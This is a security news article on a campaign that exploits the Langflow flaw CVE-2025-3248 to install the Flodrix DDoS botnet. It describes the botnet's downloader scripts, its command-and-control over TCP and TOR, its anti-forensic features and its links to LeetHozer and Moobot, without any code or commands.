Cybersecurity researchers are calling attention to a new campaign that is actively exploiting a recently disclosed critical security flaw. This campaign is leveraging a vulnerability in the AI application framework Langflow to deliver the potent Flodrix botnet malware. Attackers use this vulnerability to execute downloader scripts on many compromised Langflow servers, which then fetch and install the malware. This activity entails the exploitation of CVE-2025-3248, a missing authentication vulnerability in Langflow with a critical 9.8 CVSS score. Successful exploitation of this flaw could enable unauthenticated attackers to execute arbitrary code via specially crafted HTTP requests on servers.
The latest findings from Trend Micro show that these threat actors are specifically targeting unpatched internet-exposed Langflow instances. They are leveraging a publicly-available proof-of-concept code to conduct reconnaissance and then drop a shell script downloader onto the server. This downloader is responsible for retrieving and then executing the Flodrix botnet malware from a hardcoded attacker-controlled IP address. Once installed on a compromised system, the Flodrix malware then sets up communications with a remote server to receive commands. It receives these commands over TCP in order to launch distributed denial-of-service (DDoS) attacks against various targets of interest to them.
The Flodrix botnet malware also supports making its command-and-control connections over the anonymous TOR network to hide its activities.
Flodrix is currently assessed by security researchers to be an evolution of another botnet which is called LeetHozer. This older LeetHozer botnet has been previously linked by cybersecurity professionals to the well-known cybercriminal group known as Moobot. The improved Flodrix variant incorporates the ability to discreetly remove itself from an infected system and also to minimize its forensic traces.
This makes it much harder for incident responders to analyze the full scope of the attack after it has already occurred.
Another significant change in this new variant is the introduction of new DDoS attack types, which are now also encrypted. This adds a further layer of obfuscation that can complicate network-based detection efforts by many different types of security products. Trend Micro said it has identified the unknown threat actors hosting different downloader scripts on the same host that is used to fetch Flodrix. This observation strongly suggests that the entire malware campaign is currently undergoing very active development by the cybercriminals responsible. Attackers are likely profiling all vulnerable Langflow servers to identify high-value targets for future, more damaging infections using this malware.
